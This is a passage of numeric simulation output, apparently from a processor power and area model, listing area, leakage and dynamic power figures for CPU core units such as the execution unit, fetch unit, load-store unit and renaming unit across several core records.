'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.141616,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.228668,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.19318,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0388882,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.233233,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.233527,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.186629,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.301025,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.151947,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.639602,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.177646,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.56848,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0441183,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00782805,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0702095,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0578932,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.114328,
'Execution Unit/Register Files/Runtime Dynamic': 0.0657213,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.157636,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.412736,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.75667,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00109182,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00109182,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000980305,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000395536,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000831641,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00399558,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00942018,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0556542,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.54008,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.153712,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.189027,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.93041,
'Instruction Fetch Unit/Runtime Dynamic': 0.411809,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0390858,
'L2/Runtime Dynamic': 0.0187973,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.9809,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.879812,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0564154,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0564153,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.24731,
'Load Store Unit/Runtime Dynamic': 1.21445,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.139111,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.278221,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0493709,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0499272,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.220109,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0252896,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.461029,
'Memory Management Unit/Runtime Dynamic': 0.0752168,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.8358,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.116055,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00983254,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0939402,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.219828,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.69677,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0519126,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.243463,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.239698,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.215457,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.347525,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.175419,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.738401,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.209671,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.67884,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0452841,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00903725,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0864383,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.066836,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.131722,
'Execution Unit/Register Files/Runtime Dynamic': 0.0758732,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.195082,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.511186,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.9743,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.0013772,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.0013772,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00123884,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000501071,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000960104,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00495335,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0118003,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0642512,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.08692,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.18756,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.218226,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.50378,
'Instruction Fetch Unit/Runtime Dynamic': 0.486791,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.019492,
'L2/Runtime Dynamic': 0.00540012,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.54226,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.1177,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0745767,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0745768,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.89442,
'Load Store Unit/Runtime Dynamic': 1.56006,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.183893,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.367787,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0652644,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0654764,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.25411,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0309867,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.522331,
'Memory Management Unit/Runtime Dynamic': 0.0964631,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.2083,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.119122,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0111705,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
